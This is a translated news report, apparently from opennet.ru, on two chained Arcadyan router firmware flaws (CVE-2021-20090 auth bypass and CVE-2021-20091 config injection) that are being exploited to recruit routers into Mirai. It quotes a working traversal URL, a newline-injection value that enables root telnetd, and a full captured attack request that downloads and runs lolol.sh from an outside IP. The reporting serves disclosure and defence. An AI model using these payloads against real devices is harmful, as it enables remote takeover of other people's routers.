The network recorded a massive attack on home routers, the firmware of which uses the http-server implementation from Arcadyan. To gain control over devices, a combination of two vulnerabilities is used that allows remote execution of arbitrary code with root privileges. The problem affects a fairly large range of ADSL routers from Arcadyan, ASUS and Buffalo, as well as devices supplied under the Beeline brands (the problem is confirmed in Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone and other telecom operators. It is noted that the problem has been present in Arcadyan firmware for more than 10 years and during this time it managed to migrate to at least 20 device models from 17 different manufacturers.
The first vulnerability CVE-2021-20090 makes it possible to access any web interface script without passing authentication. The essence of the vulnerability is that in the web interface, some directories through which images, CSS files and JavaScript scripts are sent are available without authentication. In this case, the check of directories for which access is allowed without authentication is performed by the initial mask. The indication of the characters "../" in the paths to go to the parent directory is blocked by the firmware, but the use of the combination "..%2f" is skipped. Thus, it is possible to open secure pages when sending requests like "http://192.168.1.1/images/..%2findex.htm".
The second vulnerability, CVE-2021-20091, allows an authenticated user to make changes to the device's system settings by sending specially crafted parameters to the apply_abstract.cgi script, which does not check for the presence of a newline character in the parameters. For example, when performing a ping operation, an attacker can specify the value β192.168.1.2%0AARC_SYS_TelnetdEnable=1β in the field with the IP address to be checked, and the script, when creating a file with settings /tmp/etc/config/.glbcfg, will write the line βAARC_SYS_TelnetdEnable=1β into it β, which activates the telnetd server, which provides unrestricted access to the shell as root. Similarly, by setting the AARC_SYS parameter, you can execute any code in the system. The first vulnerability makes it possible to run a problematic script without authentication, accessing it as "/images/..%2fapply_abstract.cgi".
To exploit vulnerabilities, an attacker must be able to send a request to the network port on which the web interface is running. Judging by the dynamics of the spread of the attack, many operators leave access from the external network on their devices to simplify the diagnosis of problems by the support service. By limiting access to the interface to only the internal network, an attack can be made from the external network using the "DNS rebinding" technique. Vulnerabilities are already actively used to connect routers to the Mirai botnet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Connection: close User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_ping_ipaddress=212.192.241.7%0A ARC_SYS_TelnetdEnable=1& %0AARC_SYS_=cd+/tmp; wget+http://212.192.241.72/lolol.sh; curl+-O+http://212.192.241.72/lolol.sh; chmod+777+lolol.sh; sh+lolol.sh&ARC_ping_status=0&TMP_Ping_Type=4
Source: opennet.ru